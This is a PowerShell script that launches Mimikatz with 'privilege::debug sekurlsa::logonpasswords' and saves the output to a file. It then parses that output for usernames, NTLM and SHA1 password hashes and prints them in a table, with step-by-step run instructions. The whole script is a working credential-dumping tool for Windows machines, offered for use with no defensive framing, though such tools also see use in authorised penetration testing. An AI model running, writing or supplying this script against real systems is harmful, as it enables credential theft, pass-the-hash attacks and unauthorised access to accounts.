function Parse-Mimikatz-Hashes {
    [CmdletBinding()]
    param(
        [string]$raw
    )

    $results = $raw | Select-String -Pattern "(?s)(?<=msv :).+?(?=tspkg :)" -AllMatches | %{$_.matches} | %{$_.value} | Sort-Object -Unique
    
    $credentials = @()
    
    foreach($match in $results){
        if($match -match 'Username : (?<username>.+)'){
            $username = $Matches['username']
        }
        if($match -match 'NTLM     : (?<ntlm>.+)'){
            $ntlm = $Matches['ntlm']
        }
        if($match -match 'SHA1     : (?<sha1>.+)'){
            $sha1 = $Matches['sha1']
            $credentials += New-Object psobject -Property @{username=$username;ntlm=$ntlm;sha1=$sha1}
        }
    }

    $credentials | Format-Table -AutoSize -Wrap
}

# Print instructions
Write-Host "Script prints all the hashes generated by: sekurlsa::logonpasswords, STEPS:"
Write-Host "1. Ensure that mimikatz.exe is in the same directory as this script."
Write-Host "2. Run the script."
Write-Host "3. The script will automatically run Mimikatz, parse the output, and display the results."
Write-Host ""

# Run Mimikatz and log the output to a file
.\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > mimikatz_output.txt

# Read the contents of the log file into a variable
$raw = Get-Content .\mimikatz_output.txt -Raw

# Pass the raw output to the Parse-Mimikatz function
Parse-Mimikatz-Hashes $raw
